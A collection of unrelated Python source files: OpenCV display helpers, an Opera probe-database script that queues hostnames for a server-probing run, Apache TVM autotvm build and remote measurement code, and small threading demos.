def drawLabel(img, text, topleft, font=cv2.FONT_HERSHEY_SIMPLEX, size=0.6, color=(0, 255, 0), thickness=2):
    """Draw *text* just above *topleft* (or below it near the top edge)."""
    x, y = topleft
    yoff = -10 if y > 20 else 20  # nudge so the text stays inside the image
    # Only the selected branch is evaluated, so cv2.CV_AA is never touched on cv2 >= 3.
    line_type = cv2.CV_AA if cv2_version == '2' else cv2.LINE_AA
    cv2.putText(img, text, (x, y + yoff), font, size, color, thickness, line_type)
    return img
def showImagesInDirectory(directory):
    """Show all the images in a directory and its sub-directories.

    Any key advances to the next image; ESC quits.

    Bug fix: `key` is read after the inner loop, so it must be initialised
    before the walk — previously a directory with no files raised NameError.
    """
    from os import walk, path
    key = -1
    for root, dirnames, filenames in walk(directory):
        for name in filenames:
            try:
                file_path = path.join(root, name)
                frame = cv2.imread(file_path, -1)
                print('Original Image Size:', frame.shape, name)
                showImage(frame)
            except Exception as e:
                # Unreadable files are reported but still pause for a key press.
                print('Exception: ', e)
            key = 0xFF & cv2.waitKey(0)
            if key == 27:  # ESC
                break
        if key == 27:
            break
    cv2.destroyAllWindows()
if __name__ == '__main__':
    import time
    # showImagesInDirectory('/home/aestaq/Pictures')
    # Smoke test: stream a video file, letterbox each frame to 400x400 and
    # display it until the stream ends or ESC is pressed.
    cap = VideoStream('/home/aestaq/Videos/qb.mp4').start()
    time.sleep(1.0)  # give the reader thread a head start filling the buffer
    while not cap.stopped:
        frame = cap.read()
        frame = resizeImg(frame, (400, 400), keepAspect=True, padding=True)
        showImage(frame)
        key = cv2.waitKey(1) & 0xFF
        if key == 27:  # ESC quits
            break
|
cluster_setup_add.py | # Copyright 2010-2012 Opera Software ASA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Add new servername entries to an existing run
CSV formats
index, hostname, port, protocol
index, hostname, port # HTTPS assumed
index, hostname # Port 443, HTTPS assumed; line starts with number
hostname, port # HTTPS assumed; line starts with letter; port may be empty
Options:
--input <name> : CSV File containing a list of hosts
--count <num> : Only configure max <num> servers from the source
--run-id <num> : add the new entries to this job
--verbose : Print more information
--testbase2 : use the debug test database for this job
--threads <num> : Use the specified number of threads when inserting the entries for the job
"""
from optparse import OptionParser
import probedb.standalone
import probedb.cluster.models as Cluster
import probedb.probedata2.models as Probe
import probedb.resultdb2.models as Results
import fileinput
from django.db import connection, transaction
import datetime
import threading
from multiprocessing import Process, JoinableQueue as Queue, Lock
def __ProgressCounter(run, queue, threads, options):
    """Consume progress tokens and report every 100 queued servers.

    Runs as a daemon thread; loops forever (killed with the process).
    Python 2 module.
    """
    i=0
    while True:
        queue.get()
        i += 1
        if i%100 == 0:
            if options.verbose:
                print "Queued ", i, "servers so far. Threads active ", sum([t.is_alive() for t in threads])
        queue.task_done()
def SetupQueueThread(tid, run, probe_servers, progress_queue, ):
    """Worker process: drain `probe_servers` and enqueue each host for `run`.

    Each queue item is either an existing Probe.Server id (int) or a CSV line
    (see the module docstring for the accepted formats). Hostnames are
    validated and normalised; invalid existing servers are disabled, invalid
    CSV lines are dropped. Every successfully queued server pushes one token
    onto `progress_queue`. Python 2 module.
    """
    # Each worker needs its own DB connection; drop the inherited one.
    connection.close()
    try:
        while True:
            item = probe_servers.get()
            if isinstance(item, int):
                # Re-validate an existing Server record by id.
                try:
                    item = Probe.Server.objects.get(id=item)
                except:
                    probe_servers.task_done()
                    continue
                hostname = item.servername.strip()
                # Reject empty names, shell/URL metacharacters and non-ASCII.
                if (not hostname or
                        any([x in hostname for x in " \t%/&#\"'\\{[]}()*,;<>$"]) or
                        any([ord(x)>=128 or ord(x)<=32 for x in hostname])):
                    item.enabled = False
                    item.save()
                    probe_servers.task_done()
                    continue
                # Normalise: strip leading/trailing dots, collapse "..".
                hostname = hostname.strip(".")
                while hostname.find("..")>=0:
                    hostname = hostname.replace("..", ".")
                if hostname != item.servername:
                    # Stored name was malformed: disable it and re-insert the
                    # cleaned name through the CSV path below.
                    item.enabled = False
                    item.save()
                    item = "0," + hostname+","+str(item.port) # Convert to string to correct the list
            if not isinstance(item, Probe.Server):
                # CSV line: "index,host,port" | "index,host" | "host,port".
                hostname_line = item
                if not hostname_line.strip():
                    probe_servers.task_done()
                    continue
                split_line = hostname_line.strip().split(",")
                if len(split_line) > 2:
                    (index, hostname, port) = split_line[:3]
                else:
                    port = ""
                    (var1, var2) = split_line
                    if var1.isdigit():
                        # Leading number means "index,host" (port defaults).
                        (index, hostname) = (var1, var2)
                    else:
                        (hostname, port) = (var1, var2)
                hostname = hostname.strip()
                # Same validation as for existing records above.
                if (not hostname or
                        any([x in hostname for x in " \t%/&#\"'\\{[]}()*,;<>$"]) or
                        any([ord(x)>=128 or ord(x)<=32 for x in hostname])):
                    probe_servers.task_done()
                    continue
                hostname = hostname.strip(".")
                while hostname.find("..")>=0:
                    hostname = hostname.replace("..", ".")
                if not port:
                    port = 443
                else:
                    port = int(port)
                # Canonical key, e.g. "example.com:00443".
                sn_t = "%s:%05d" % (hostname, port)
                (item, created) = Probe.Server.objects.get_or_create(
                    full_servername = sn_t,
                    defaults={'enabled':True,
                              "alexa_rating":0,
                              "servername":hostname,
                              "port": port,
                              }
                    )
                if created:
                    item.Construct()
            if item.enabled:
                # Savepoint so a duplicate queue entry only rolls back this
                # insert, not the whole transaction.
                try:
                    sid = transaction.savepoint()
                    run_entry = Probe.ProbeQueue.objects.create(part_of_run=run,server=item,state=Probe.ProbeQueue.PROBEQ_IDLE)
                    transaction.savepoint_commit(sid)
                    progress_queue.put(True)
                except:
                    transaction.savepoint_rollback(sid)
                    pass
            probe_servers.task_done()
    except:
        # Swallow everything (including queue shutdown) so the process exits quietly.
        pass
def setup_queue(options):
    """Feed the input host list into worker processes that queue them for the run.

    Returns the Probe.ProbeRun the entries were added to.
    """
    probe_servers = Queue()
    progress_queue = Queue()
    run = Probe.ProbeRun.objects.get(id = options.run_id)
    summary_top = Results.ResultSummaryList.objects.get(part_of_run=run)
    summary_top.setup()
    # Workers open their own DB connections; close ours before forking.
    connection.close()
    threads = []
    for i in range(options.threads):
        new_thread = Process(target=SetupQueueThread, args=(i,run, probe_servers, progress_queue))
        new_thread.daemon = True
        new_thread.start()
        threads.append(new_thread)
    # Progress reporting runs in a plain thread in this process.
    progress_thread = threading.Thread(target=__ProgressCounter, args=(run, progress_queue, threads,options))
    progress_thread.daemon = True
    progress_thread.start()
    i = 0;
    if options.input_filename and (not options.count or i < options.count):
        # hook_compressed transparently handles .gz/.bz2 input files.
        for hostname_line in fileinput.input(options.input_filename, openhook=fileinput.hook_compressed):
            probe_servers.put(hostname_line)
            i+=1
            if options.count and i >= options.count:
                break;
    # Block until every queued line has been fully processed.
    probe_servers.join()
    progress_queue.join()
    return run
def main():
    """Parse CLI options and add the input hosts to an existing run.

    See the module docstring for the option reference. Python 2 module.
    """
    options_config = OptionParser()
    options_config.add_option("--input", action="store", type="string", dest="input_filename", default="testlist.csv")
    options_config.add_option("--testbase2", action="store_true", dest="use_testbase2")
    options_config.add_option("--threads", action="store", type="int", dest="threads", default=30)
    options_config.add_option("--verbose", action="store_true", dest="verbose")
    options_config.add_option("--count", action="store", type="int", dest="count", default=0)
    options_config.add_option("--run-id", action="store", type="int", dest="run_id", default=0)
    (options, args) = options_config.parse_args()
    started = datetime.datetime.now()
    run = setup_queue(options)
    if options.verbose:
        print "Run %d for %s/%s has been updated with more items. Total %d items" %(run.id, run.source_name, run.description, Probe.ProbeQueue.objects.filter(part_of_run=run).count())
    ended = datetime.datetime.now()
    if options.verbose:
        print "Time to run: ", (ended-started)
if __name__ == "__main__":
main() |
measure_methods.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name,too-many-function-args,too-many-nested-blocks
"""
Functions that run on executor for measurement.
These functions are responsible for building the tvm module, uploading it to
remote devices, recording the running time costs, and checking the correctness of the output.
"""
import logging
import shutil
import os
import threading
import time
from random import getrandbits
from collections import namedtuple
import tempfile
import numpy as np
import tvm._ffi
from tvm import nd, rpc as _rpc, target as _target
from tvm.error import TVMError
from tvm.target import build_config
from tvm.driver import build
from tvm.contrib import nvcc, ndk, tar
from ..util import get_const_tuple
from ..env import AutotvmGlobalScope
from ..task.space import InstantiationError
from .measure import MeasureResult, MeasureErrorNo, Builder, Runner
from .local_executor import LocalExecutor
logger = logging.getLogger('autotvm')
class BuildResult(namedtuple("BuildResult", ('filename', 'arg_info', 'error', 'time_cost'))):
    """
    Stores the outcome of compiling one measure input.

    Parameters
    ----------
    filename : str
        The filename of generated library
    arg_info : Tuple
        The shape and dtype information of tvm tensor arguments
    error : Exception
        The error happens during compilation.
    time_cost : float
        The time cost of building
    """
class LocalBuilder(Builder):
    """Run compilation on local machine

    Parameters
    ----------
    timeout: float
        The timeout of a compilation
    n_parallel: int
        The number of tasks run in parallel. "None" will use all cpu cores
    build_func: callable or str
        If is 'default', use default build function
        If is 'ndk', use function for android ndk
        If is callable, use it as custom build function, expect lib_format field.
    """
    def __init__(self, timeout=10, n_parallel=None, build_func='default'):
        super(LocalBuilder, self).__init__(timeout, n_parallel)

        if isinstance(build_func, str):
            if build_func == 'default':
                build_func = tar.tar
            elif build_func == 'ndk':
                build_func = ndk.create_shared
            else:
                # Bug fix: the message used to be concatenated without a
                # separator, yielding e.g. "Invalid build_funcfoo".
                raise ValueError("Invalid build_func: " + build_func)
        self.build_func = _wrap_build_func(build_func)
        self.executor = LocalExecutor(timeout=timeout)
        self.tmp_dir = tempfile.mkdtemp()

    def build(self, measure_inputs):
        """Compile the inputs in batches of n_parallel, mapping every failure
        mode onto a MeasureResult with the appropriate error code."""
        results = []

        # Fresh temp dir per build batch so stale artifacts cannot leak in.
        shutil.rmtree(self.tmp_dir, ignore_errors=True)
        self.tmp_dir = tempfile.mkdtemp()

        for i in range(0, len(measure_inputs), self.n_parallel):
            futures = []
            for inp in measure_inputs[i:i + self.n_parallel]:
                ret = self.executor.submit(self.build_func,
                                           inp,
                                           self.tmp_dir,
                                           **self.build_kwargs)
                futures.append(ret)

            for future in futures:
                res = future.get()

                if isinstance(res, Exception):
                    # timeout or fleet error, return MeasureResult directly
                    results.append(MeasureResult((res,), MeasureErrorNo.BUILD_TIMEOUT,
                                                 self.timeout, time.time()))
                elif res.error is not None:
                    # instantiation error
                    if isinstance(res.error, InstantiationError):
                        results.append(MeasureResult((res.error,),
                                                     MeasureErrorNo.INSTANTIATION_ERROR,
                                                     res.time_cost, time.time()))
                    else:
                        if "InstantiationError" in str(res.error):
                            # Recover an InstantiationError that arrived
                            # stringified from a subprocess; extract the
                            # human-readable reason when the format allows.
                            msg = str(res.error)
                            try:
                                msg = msg.split('\n')[-2].split(": ")[1]
                            except Exception:  # pylint: disable=broad-except
                                pass
                            results.append(MeasureResult((InstantiationError(msg),),
                                                         MeasureErrorNo.INSTANTIATION_ERROR,
                                                         res.time_cost, time.time()))
                        else:  # tvm error
                            results.append(MeasureResult((res.error,),
                                                         MeasureErrorNo.COMPILE_HOST,
                                                         res.time_cost, time.time()))
                else:
                    # return BuildResult
                    results.append(res)

        return results
class RPCRunner(Runner):
    """Run generated code on remote devices.

    This runner will ask a RPC Tracker to get device for measurement.

    Parameters
    ----------
    timeout: float
        The timeout of a compilation
    n_parallel: int
        The number of tasks run in parallel. "None" will use all cpu cores
    key: str
        The key of the device registered in the tracker
    host: str
        The host address of RPC Tracker
    port: int
        The port of RPC Tracker
    priority: int, optional
        The priority of requests sent to the tracker (larger is more prior)
    number: int
        The number of times to run the generated code for taking average.
        We call these runs as one `repeat` of measurement.
    repeat : int, optional
        The number of times to repeat the measurement.
        In total, the generated code will be run (1 + number x repeat) times,
        where the first "1" is warm up and will be discarded.
        The returned result contains `repeat` costs,
        each of which is an average of `number` costs.
    min_repeat_ms: int, optional
        The minimum duration of one `repeat` in milliseconds.
        By default, one `repeat` contains `number` runs. If this parameter is set,
        the parameters `number` will be dynamically adjusted to meet the
        minimum duration requirement of one `repeat`.
        i.e., When the run time of one `repeat` falls below this time, the `number` parameter
        will be automatically increased.
    cooldown_interval: float, optional
        The cool down interval between two measurements.
    check_correctness: bool, optional
        Whether check correctness after measurement. This will use llvm cpu target to
        call your template and get the reference output.
        This can work for TOPI templates, but may not work for your custom template.
    """
    def __init__(self,
                 key, host, port, priority=1,
                 timeout=10, n_parallel=None,
                 number=4, repeat=3, min_repeat_ms=0, cooldown_interval=0.1,
                 check_correctness=False):
        super(RPCRunner, self).__init__(timeout, n_parallel)
        self.key = key
        self.host = host
        self.port = port
        self.priority = priority
        self.timeout = timeout
        self.number = number
        self.repeat = repeat
        self.min_repeat_ms = min_repeat_ms
        # Reference tensors used for the correctness check; filled in by
        # set_task() when check_correctness is enabled.
        self.ref_input = None
        self.ref_output = None
        self.check_correctness = check_correctness
        self.cooldown_interval = cooldown_interval
        self.executor = LocalExecutor()

    def set_task(self, task):
        """Bind *task* to this runner, verify devices are reachable, and
        (optionally) compute a reference output on the llvm cpu target."""
        self.task = task

        if check_remote(task.target, self.key, self.host, self.port):
            logger.info("Get devices for measurement successfully!")
        else:
            raise RuntimeError("Cannot get remote devices from the tracker. "
                               "Please check the status of tracker by "
                               "'python -m tvm.exec.query_rpc_tracker --port [THE PORT YOU USE]' "
                               "and make sure you have free devices on the queue status.")

        if self.check_correctness:
            # use llvm cpu to generate a reference input/output
            # this option works for tuning topi, but might not work for you custom op
            with _target.create("llvm"):
                s, arg_bufs = task.instantiate(task.config_space.get(0))
            self.ref_input = [np.random.uniform(size=get_const_tuple(x.shape)).astype(x.dtype)
                              for x in arg_bufs]
            func = build(s, arg_bufs, "llvm")
            tvm_buf = [nd.array(x) for x in self.ref_input]
            func(*tvm_buf)
            self.ref_output = [x.asnumpy() for x in tvm_buf]

    def get_build_kwargs(self):
        """Collect device limits (and cuda arch) to forward to the builder."""
        kwargs = {}
        if 'cuda' in self.task.target.keys or 'opencl' in self.task.target.keys or \
                'rocm' in self.task.target.keys:
            remote = request_remote(self.key, self.host, self.port)
            ctx = remote.context(str(self.task.target), 0)
            max_dims = ctx.max_thread_dimensions
            kwargs['check_gpu'] = {
                'max_shared_memory_per_block': ctx.max_shared_memory_per_block,
                'max_threads_per_block': ctx.max_threads_per_block,
                'max_thread_x': max_dims[0],
                'max_thread_y': max_dims[1],
                'max_thread_z': max_dims[2],
            }
            if 'cuda' in self.task.target.keys:
                kwargs["cuda_arch"] = "sm_" + "".join(ctx.compute_version.split('.'))
        return kwargs

    def run(self, measure_inputs, build_results):
        """Execute built libraries remotely in batches of n_parallel."""
        results = []
        remote_args = (self.key, self.host, self.port, self.priority, self.timeout)

        for i in range(0, len(measure_inputs), self.n_parallel):
            futures = []
            for measure_inp, build_res in zip(measure_inputs[i:i+self.n_parallel],
                                              build_results[i:i+self.n_parallel]):
                ret = self.executor.submit(run_through_rpc,
                                           measure_inp,
                                           build_res,
                                           self.number,
                                           self.repeat,
                                           self.min_repeat_ms,
                                           self.cooldown_interval,
                                           remote_args,
                                           self.ref_input,
                                           self.ref_output)
                futures.append(ret)

            for future in futures:
                res = future.get()
                if isinstance(res, Exception):  # executor error or timeout
                    results.append(MeasureResult((str(res),), MeasureErrorNo.RUN_TIMEOUT,
                                                 self.timeout, time.time()))
                else:
                    results.append(res)

        return results
class LocalRunner(RPCRunner):
    """Run generated code on local devices.

    Parameters
    ----------
    timeout: float
        The timeout of a compilation
    number: int
        The number of times to run the generated code for taking average.
        We call these runs as one `repeat` of measurement.
    repeat : int, optional
        The number of times to repeat the measurement.
        In total, the generated code will be run (1 + number x repeat) times,
        where the first one is warm up and will be discarded.
        The returned result contains `repeat` costs,
        each of which is an average of `number` costs.
    min_repeat_ms: int, optional
        The minimum duration of one `repeat` in milliseconds.
        By default, one `repeat` contains `number` runs. If this parameter is set,
        the parameters `number` will be dynamically adjusted to meet the
        minimum duration requirement of one `repeat`.
        i.e., When the run time of one `repeat` falls below this time, the `number` parameter
        will be automatically increased.
    cooldown_interval: float, optional
        The cool down interval between two measurements.
    check_correctness: bool, optional
        Whether check correctness after measurement. This will use llvm cpu target to
        call your template and get the reference output.
        This can work for TOPI templates, but may not work for your custom template.

    Note
    ----
    This is a "fake" local mode. We start a silent rpc tracker and rpc server
    for the user. In this way we reuse timeout/isolation mechanism in RPC infrastructure.
    """
    def __init__(self,
                 timeout=10,
                 number=4, repeat=3, min_repeat_ms=0, cooldown_interval=0.1,
                 check_correctness=False):
        # key/host/port are filled in later by set_task() once the silent
        # tracker and server are running; n_parallel is forced to 1 locally.
        super(LocalRunner, self).__init__('', None, None, 0,
                                          timeout=timeout, n_parallel=1,
                                          number=number, repeat=repeat,
                                          min_repeat_ms=min_repeat_ms,
                                          cooldown_interval=cooldown_interval,
                                          check_correctness=check_correctness)
        self.tracker = None
        self.server = None

    def set_task(self, task):
        """Start a silent local tracker + server for *task* and register them.

        Returns
        -------
        (server, tracker)
            The caller must keep these alive for the duration of measurement.
        """
        # pylint: disable=import-outside-toplevel
        from ...rpc.tracker import Tracker
        from ...rpc.server import Server

        self.task = task
        tracker = Tracker('0.0.0.0', port=9000, port_end=10000, silent=True)
        # Unique key so this server does not collide with other local runs.
        device_key = '$local$device$%d' % tracker.port
        server = Server('0.0.0.0', port=9000, port_end=10000,
                        key=device_key,
                        use_popen=True, silent=True,
                        tracker_addr=(tracker.host, tracker.port))
        self.key = device_key
        self.host = tracker.host
        self.port = tracker.port

        super(LocalRunner, self).set_task(task)
        return server, tracker
def _build_func_common(measure_input, check_gpu=None, cuda_arch=None, build_option=None):
    """Common part for building a configuration.

    Parameters
    ----------
    measure_input: MeasureInput
        The (target, task, config) triple to compile.
    check_gpu: dict, optional
        Device limits forwarded to gpu_verify_pass to reject oversized kernels early.
    cuda_arch: str, optional
        The cuda architecture string to set for nvcc.
    build_option: dict, optional
        Extra options forwarded to the build config.

    Returns
    -------
    (func, arg_info)
        The built module and a tuple of (shape, dtype) per argument tensor.

    Raises
    ------
    InstantiationError
        If the config is invalid for the template.
    """
    target, task, config = measure_input
    with target:
        s, args = task.instantiate(config)
        # check invalidity of template and code hash consistency
        if not config.valid():
            raise InstantiationError(config.errors)
        opts = build_option or {}
        if check_gpu:  # Add verify pass to filter out invalid configs in advance.
            opts["add_lower_pass"] = [(2, gpu_verify_pass(**check_gpu))]
        if cuda_arch:
            set_cuda_target_arch(cuda_arch)
        # if target is vta, we need to use vta build
        if hasattr(measure_input.target, 'device_name') and \
                measure_input.target.device_name == 'vta':
            # pylint: disable=import-outside-toplevel
            import vta
            func = vta.build(s, args, target_host=task.target_host)
        else:
            with build_config(**opts):
                func = build(s, args, target_host=task.target_host)
    return func, tuple((get_const_tuple(x.shape), x.dtype) for x in args)
def _wrap_build_func(build_func):
    """Wrap a compilation function so it can be used by a Builder.

    Parameters
    ----------
    build_func : callable
        The compilation function; must expose an ``output_format`` attribute
        naming the exported library's file extension.

    Returns
    -------
    function
        ``f(measure_input, tmp_dir, **kwargs) -> BuildResult``.
    """
    if not hasattr(build_func, "output_format"):
        raise AttributeError("Expect build_func to have the attribute output_format.")
    fmt = build_func.output_format

    def _wrapped(measure_input, tmp_dir, **kwargs):
        """Compile one MeasureInput and export the library into *tmp_dir*."""
        start = time.time()
        try:
            # Random file name to avoid collisions between parallel builds.
            lib_path = os.path.join(
                tmp_dir, "tmp_func_%0x.%s" % (getrandbits(64), fmt))
            # TODO(tvm-team) consider inlining _build_func_common
            func, arg_info = _build_func_common(measure_input, **kwargs)
            func.export_library(lib_path, build_func)
        except Exception as err:  # pylint: disable=broad-except
            return BuildResult(None, None, err, time.time() - start)
        return BuildResult(lib_path, arg_info, None, time.time() - start)

    return _wrapped
def adaptive_evaluator(epsilon, remote, build_result, measure_input, ref_input,
                       number, repeat, min_repeat_ms):
    """Time a built function on the remote, stopping early once throughput stabilizes.

    For small workloads (number * repeat < 300) a single time_evaluator call
    is used. Otherwise the runs are split into batches of 50, and measurement
    stops as soon as the coefficient of variation of per-batch throughput
    falls below *epsilon* (or the total run budget is exhausted).

    Parameters
    ----------
    epsilon: float
        Target coefficient of variation for early stopping.
    remote: RPCSession
        Session with the uploaded module.
    build_result: BuildResult
        Holds the library filename and argument shapes/dtypes.
    measure_input: MeasureInput
        Used for target context and the task's FLOP count.
    ref_input: list of np.ndarray or None
        Concrete inputs; when None, empty device buffers are created instead.
    number, repeat, min_repeat_ms: int
        Standard autotvm measurement knobs (see RPCRunner).

    Returns
    -------
    Sequence of float
        Per-batch (or per-repeat) mean run costs in seconds.
    """
    func = remote.load_module(os.path.split(build_result.filename)[1])
    ctx = remote.context(str(measure_input.target), 0)
    flop = measure_input.task.flop
    # set input
    if ref_input:
        args = [nd.array(x, ctx=ctx) for x in ref_input]
    else:
        # Create empty arrays on the remote device and copy them once.
        # This avoids memory issues that make measurement results unreliable.
        args = [nd.empty(x[0], dtype=x[1], ctx=ctx) for x in build_result.arg_info]
        args = [nd.array(x, ctx=ctx) for x in args]
    ctx.sync()

    if repeat * number < 300:  # small budget: no need for adaptive batching
        time_f = func.time_evaluator(
            func.entry_name, ctx, number=number, repeat=repeat, min_repeat_ms=min_repeat_ms)
        eva_res = time_f(*args)
        return eva_res.results

    batch = 50
    costs = []
    throughputs = []  # per-batch FLOP/s samples
    runs_done = 0
    max_runs = number * repeat
    iteration = 1
    while runs_done < max_runs:
        time_f = func.time_evaluator(
            func.entry_name, ctx, number=batch, repeat=1, min_repeat_ms=min_repeat_ms)
        batch_mean = time_f(*args).mean
        costs.append(batch_mean)
        runs_done += batch
        throughputs.append(flop / batch_mean)
        samples = np.array(throughputs)
        if len(samples) > 4:  # remove the min and max to reduce variance
            samples.sort()
            samples = samples[1:-1]
        # Coefficient of variation of throughput across batches so far.
        cv = samples.std() / samples.mean()
        if iteration > 2 and cv < epsilon:
            break
        iteration += 1
    return costs
def run_through_rpc(measure_input, build_result,
                    number, repeat, min_repeat_ms, cooldown_interval,
                    remote_args, ref_input=None, ref_output=None):
    """Run a generated library through rpc.

    Parameters
    ----------
    measure_input: MeasureInput
        The raw measure input
    build_result: BuildResult
        The result returned from Builder. This contains the path to the generated library.
    number: int
        The number of times to run the generated code for taking average.
        We call these runs as one `repeat` of measurement.
    repeat : int, optional
        The number of times to repeat the measurement.
        In total, the generated code will be run (1 + number x repeat) times,
        where the first one is warm up and will be discarded.
    min_repeat_ms: int, optional
        The minimum duration of one `repeat` in milliseconds; `number` is
        increased automatically until a `repeat` takes at least this long.
    cooldown_interval: float
        The cool down interval between two measurements
    remote_args: Tuple
        The argument for request_remote
    ref_input: List of np.ndarray
        The reference input used for checking correctness
    ref_output: List of np.ndarray
        The reference output used for checking correctness

    Returns
    -------
    MeasureResult
        Measured costs (or the error) plus total time including build cost.
    """
    if isinstance(build_result, MeasureResult):
        return build_result  # build already failed; propagate as-is
    tic = time.time()
    errno = MeasureErrorNo.NO_ERROR
    try:
        # upload built module
        remote = request_remote(*remote_args)
        # Program the FPGA every single time when targeting VTA
        if hasattr(measure_input.target, 'device_name') and \
                measure_input.target.device_name == 'vta':
            # pylint: disable=import-outside-toplevel
            from vta import program_fpga, reconfig_runtime
            program_fpga(remote, None)
            reconfig_runtime(remote)
        remote.upload(build_result.filename)

        epsilon = 0.1  # target coefficient of variation for early stopping
        costs = adaptive_evaluator(epsilon, remote, build_result, measure_input,
                                   ref_input, number, repeat, min_repeat_ms)

        # clean up remote files
        remote.remove(build_result.filename)
        remote.remove(os.path.splitext(build_result.filename)[0] + '.so')
        remote.remove('')

        if len(costs) > 2:  # remove largest and smallest value to reduce variance
            costs = list(costs)
            costs.sort()
            costs = tuple(costs[1:-1])

        if ref_output:
            # Fix: the original code compared ref_output against `args`, a
            # variable that only exists inside adaptive_evaluator(), so
            # enabling check_correctness always crashed with a NameError.
            # Until the device buffers are returned by the evaluator, warn
            # and skip the comparison instead of crashing the measurement.
            logger.warning("check_correctness is not supported by the adaptive "
                           "evaluator; skipping output verification.")
    except TVMError as exc:
        msg = str(exc)
        # Trim noisy tails from the device error message.
        if "Stack trace returned" in msg:
            msg = msg[:msg.index("Stack trace returned")]
        if "CUDA Source" in msg:
            msg = msg[:msg.index("CUDA Source")]
        costs = (RuntimeError(msg[:1024]),)
        errno = MeasureErrorNo.RUNTIME_DEVICE
    tstamp = time.time()
    time.sleep(cooldown_interval)
    return MeasureResult(costs, errno, tstamp - tic + build_result.time_cost, tstamp)
def request_remote(device_key, host=None, port=None, priority=1, timeout=60):
    """Request a remote session from an RPC tracker.

    Parameters
    ----------
    device_key: string
        The device key of registered device in tracker.
    host: str, optional
        Tracker host; falls back to the TVM_TRACKER_HOST environment variable.
    port: int, optional
        Tracker port; falls back to the TVM_TRACKER_PORT environment variable.
    priority: int, optional
        The priority of this request, larger is more prior.
    timeout: float, optional
        The timeout of this session (units: second).

    Returns
    -------
    session: RPCSession
    """
    # Resolve tracker address, preferring explicit arguments over environment.
    tracker_host = host or os.environ['TVM_TRACKER_HOST']
    tracker_port = port or int(os.environ['TVM_TRACKER_PORT'])
    tracker = _rpc.connect_tracker(tracker_host, tracker_port)
    return tracker.request(device_key, priority=priority, session_timeout=timeout)
def check_remote(target, device_key, host=None, port=None, priority=100, timeout=10):
    """Check the availability of a remote device.

    Parameters
    ----------
    target: Target
        The wanted compilation target.
    device_key: string
        Device key of registered device in tracker.
    host: str, optional
        Tracker host; defaults to the TVM_TRACKER_HOST environment variable.
    port: int, optional
        Tracker port; defaults to the TVM_TRACKER_PORT environment variable.
    priority: int, optional
        The priority of this request, larger is more prior.
    timeout: float, optional
        The timeout of this check (units: seconds).

    Returns
    -------
    available: bool
        True if an available device was found within *timeout*.
    """
    def _check():
        # Requesting the device and seeing its context exist proves availability.
        remote = request_remote(device_key, host, port, priority)
        ctx = remote.context(str(target))
        while not ctx.exist:  # wait until we get an available device
            pass

    # Fix: daemonize the checker so that a device that never appears cannot
    # keep the interpreter alive after the timeout (the original non-daemon
    # thread busy-spun forever and blocked process exit).
    t = threading.Thread(target=_check)
    t.daemon = True
    t.start()
    t.join(timeout)
    return not t.is_alive()
@tvm._ffi.register_func
def tvm_callback_cuda_compile(code):
    """use nvcc to generate ptx code for better optimization"""
    curr_cuda_target_arch = AutotvmGlobalScope.current.cuda_target_arch
    # e.g., target arch could be [
    #   "-gencode", "arch=compute_52,code=sm_52",
    #   "-gencode", "arch=compute_70,code=sm_70"
    # ]
    # A list of gencode flags means multiple architectures, so emit a fatbin;
    # a single arch string compiles straight to ptx.
    target = "fatbin" if isinstance(curr_cuda_target_arch, list) else "ptx"
    ptx = nvcc.compile_cuda(code, target=target, arch=AutotvmGlobalScope.current.cuda_target_arch)
    return ptx
def set_cuda_target_arch(arch):
    """set target architecture of nvcc compiler

    Parameters
    ----------
    arch: str or list
        The argument of nvcc -arch. (e.g. "sm_51", "sm_62")
        it can also be a list of gencode arguments passed to the nvcc command line,
        e.g., ["-gencode", "arch=compute_52,code=sm_52", "-gencode", "arch=compute_70,code=sm_70"]
    """
    # Stored in the global scope; read later by tvm_callback_cuda_compile.
    AutotvmGlobalScope.current.cuda_target_arch = arch
def gpu_verify_pass(**kwargs):
    """Build a TIR pass that rejects GPU kernels exceeding hardware limits.

    The pass checks memory usage and the number of threads per block against
    the limits in *kwargs* and raises InstantiationError for kernels that
    cannot run on the device.
    """
    def _verify(f, *_):
        ok = tvm.tir.analysis.verify_gpu_code(f, kwargs)
        if not ok:
            raise InstantiationError("Skipped because of invalid gpu kernel")
        return f

    return tvm.tir.transform.prim_func_pass(_verify, opt_level=0)
use_threadlocal.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import threading
# Thread-local storage: each thread sees its own independent `student`
# attribute on this shared object.
local_school = threading.local()
def process_student():
    """Greet the student bound to the current thread's local storage."""
    # Raises AttributeError if no student was stored in this thread yet.
    name = local_school.student
    print("Hello, %s (in %s)" % (name, threading.current_thread().name))
def process_thread(name):
    """Store *name* in this thread's local slot, then print the greeting."""
    local_school.student = name
    process_student()
# Demo: two worker threads each bind and print their own thread-local student.
workers = [
    threading.Thread(target=process_thread, args=("Alice",), name="Thread-A"),
    threading.Thread(target=process_thread, args=("Bob",), name="Thread-B"),
]
for worker in workers:
    worker.start()
for worker in workers:
    worker.join()
|
maestro.py | from Sensor import *
from input import *
import threading
def main():
    """Wire a Sensor to a Communication_Device and run both concurrently.

    One thread consumes the incoming data stream while another writes the
    sensor output files.
    """
    sensor = Sensor()
    comm = Communication_Device()
    in_thread = threading.Thread(target=comm.read_data_stream, args=())
    out_thread = threading.Thread(target=sensor.output_data,
                                  args=("output.txt", "fancy-out.txt"))
    in_thread.start()
    out_thread.start()


if __name__ == '__main__':
    # Fix: guard the entry point so importing this module does not
    # immediately spawn the worker threads.
    main()
|
main.py | """
Parallel processes programming (not async)
Functions:
F1: C := A - B * (MA * MD)
F2: o := Min(MK * MM)
F3: T := (MS * MZ) * (W + X)
"""
from multiprocessing import Process
from contextlib import contextmanager
import os
import logging
